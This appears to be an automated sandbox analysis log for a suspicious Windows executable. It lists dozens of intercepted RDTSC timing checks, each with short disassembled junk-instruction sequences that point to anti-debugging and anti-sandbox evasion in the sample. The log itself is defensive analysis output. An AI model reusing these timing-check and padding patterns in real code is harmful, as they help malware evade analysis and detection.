Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A13628 second address: A13645 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jmp 00007F97B4EC49C8h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A13645 second address: A1365B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 jmp 00007F97B4F2EDD0h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A13E14 second address: A13E2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 je 00007F97B4EC49B6h 0x0000000e push edx 0x0000000f pop edx 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A13E2D second address: A13E31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A16677 second address: A1667D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A1667D second address: A16681 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A16681 second address: A16693 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F97B4EC49BAh 0x0000000d rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A1A5C9 second address: A1A5EB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F97B4F2EDD0h 0x00000007 jmp 00007F97B4F2EDCEh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A1A5EB second address: A1A5F5 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F97B4EC49BCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A1A781 second address: A1A7A6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F97B4F2EDCDh 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jmp 00007F97B4F2EDCBh 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 pushad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A1A7A6 second address: A1A7AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A1A7AF second address: A1A7B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A1AD92 second address: A1AD9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F97B4EC49B6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A1B2C8 second address: A1B2E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 jmp 00007F97B4F2EDD9h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A22607 second address: A2260C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A2260C second address: A22617 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push esi 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A2603D second address: A2608C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F97B4EC49C5h 0x00000007 jmp 00007F97B4EC49C5h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jp 00007F97B4EC49E7h 0x00000014 jmp 00007F97B4EC49C7h 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A2608C second address: A26090 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A258DA second address: A258E4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 popad 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A258E4 second address: A25920 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F97B4F2EDD0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F97B4F2EDD5h 0x00000011 jmp 00007F97B4F2EDD0h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A25920 second address: A25932 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F97B4EC49BBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A25D73 second address: A25D77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A25D77 second address: A25D91 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F97B4EC49C3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A2A266 second address: A2A26C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A2A26C second address: A2A28B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 ja 00007F97B4EC49BEh 0x0000000d push eax 0x0000000e push edx 0x0000000f push edi 0x00000010 pop edi 0x00000011 jns 00007F97B4EC49B6h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A2E9B0 second address: A2E9B6 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A2E9B6 second address: A2E9BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A2E9BC second address: A2E9CC instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F97B4F2EDC8h 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b pop eax 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A2E9CC second address: A2E9D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A2E9D0 second address: A2E9DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9E02F5 second address: 9E02FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A37728 second address: A3773C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F97B4F2EDCBh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A358A1 second address: A358A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A358A5 second address: A358B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 jc 00007F97B4F2EDD2h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A35A1A second address: A35A2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pushad 0x00000007 pushad 0x00000008 jnl 00007F97B4EC49B6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A35A2A second address: A35A4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F97B4F2EDCEh 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F97B4F2EDCDh 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A36402 second address: A36446 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F97B4EC49C8h 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 popad 0x00000012 pushad 0x00000013 jc 00007F97B4EC49B8h 0x00000019 pushad 0x0000001a popad 0x0000001b jo 00007F97B4EC49BAh 0x00000021 pushad 0x00000022 popad 0x00000023 pushad 0x00000024 popad 0x00000025 jl 00007F97B4EC49B8h 0x0000002b push eax 0x0000002c push edx 0x0000002d push eax 0x0000002e push edx 0x0000002f rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A36446 second address: A36450 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F97B4F2EDC6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A366F0 second address: A366F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A366F4 second address: A36706 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F97B4F2EDCAh 0x0000000d rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A36706 second address: A36717 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jbe 00007F97B4EC49B6h 0x00000009 je 00007F97B4EC49B6h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A36717 second address: A36720 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A36720 second address: A36724 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A3F648 second address: A3F64E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A3F64E second address: A3F652 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A3F652 second address: A3F65E instructions: 0x00000000 rdtsc 0x00000002 jns 00007F97B4F2EDC6h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A3E81A second address: A3E837 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F97B4EC49C9h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A3E837 second address: A3E845 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jbe 00007F97B4F2EDC6h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A3E9A8 second address: A3E9AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A3EC6C second address: A3EC90 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F97B4F2EDCEh 0x00000007 jmp 00007F97B4F2EDD2h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A3EC90 second address: A3EC9E instructions: 0x00000000 rdtsc 0x00000002 jc 00007F97B4EC49B8h 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A3EC9E second address: A3ECA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A3ECA4 second address: A3ECC2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F97B4EC49C3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A3ECC2 second address: A3ECC6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A44D12 second address: A44D1E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 js 00007F97B4EC49B6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A44D1E second address: A44D6B instructions: 0x00000000 rdtsc 0x00000002 jns 00007F97B4F2EDCCh 0x00000008 jne 00007F97B4F2EDC6h 0x0000000e jnl 00007F97B4F2EDCCh 0x00000014 jns 00007F97B4F2EDC6h 0x0000001a pop edx 0x0000001b pop eax 0x0000001c pushad 0x0000001d pushad 0x0000001e jmp 00007F97B4F2EDD3h 0x00000023 jmp 00007F97B4F2EDD7h 0x00000028 popad 0x00000029 push eax 0x0000002a push edx 0x0000002b push eax 0x0000002c push edx 0x0000002d rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A44D6B second address: A44D71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A44D71 second address: A44D8E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F97B4F2EDD5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edi 0x0000000c pop edi 0x0000000d rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A45312 second address: A4532B instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ecx 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F97B4EC49BDh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A45732 second address: A4574F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F97B4F2EDD8h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A4574F second address: A4575C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 jnp 00007F97B4EC49B6h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A459F6 second address: A45A07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 push edx 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b jno 00007F97B4F2EDC6h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A45B6E second address: A45B8C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F97B4EC49C8h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A45B8C second address: A45B90 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A45B90 second address: A45BA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c jl 00007F97B4EC49B6h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A462BC second address: A462C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A462C0 second address: A462D3 instructions: 0x00000000 rdtsc 0x00000002 js 00007F97B4EC49B8h 0x00000008 pushad 0x00000009 popad 0x0000000a push esi 0x0000000b jp 00007F97B4EC49B6h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A4D93E second address: A4D944 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A4D944 second address: A4D950 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A4D950 second address: A4D954 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A4D954 second address: A4D95A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A4DAA2 second address: A4DAAC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 pushad 0x00000008 popad 0x00000009 pop edi 0x0000000a rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A4DC44 second address: A4DC48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A4DC48 second address: A4DC5E instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push esi 0x0000000a pop esi 0x0000000b pushad 0x0000000c popad 0x0000000d jc 00007F97B4F2EDC6h 0x00000013 push edx 0x00000014 pop edx 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A4DC5E second address: A4DC68 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 pop eax 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A4DC68 second address: A4DC6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A4DC6E second address: A4DC74 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A4DC74 second address: A4DC81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A4DC81 second address: A4DC87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A4DC87 second address: A4DC97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F97B4F2EDCBh 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A4F596 second address: A4F59C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A5EAB4 second address: A5EAC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F97B4F2EDCAh 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A5E794 second address: A5E7A4 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 push edx 0x00000006 pop edx 0x00000007 pop ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a jns 00007F97B4EC49B6h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A5E7A4 second address: A5E7A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A64A65 second address: A64A6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A64A6B second address: A64A70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A64A70 second address: A64A93 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F97B4EC49C6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push ebx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e pop ebx 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A64A93 second address: A64AA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jp 00007F97B4F2EDC6h 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A64AA0 second address: A64AA5 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A6FB07 second address: A6FB1D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F97B4F2EDCCh 0x00000007 js 00007F97B4F2EDCCh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A6F92B second address: A6F935 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F97B4EC49B6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A6F935 second address: A6F94B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F97B4F2EDCCh 0x00000007 jc 00007F97B4F2EDC6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A6F94B second address: A6F961 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push edi 0x00000004 pop edi 0x00000005 jmp 00007F97B4EC49BDh 0x0000000a pop ebx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A6F961 second address: A6F97F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F97B4F2EDD8h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
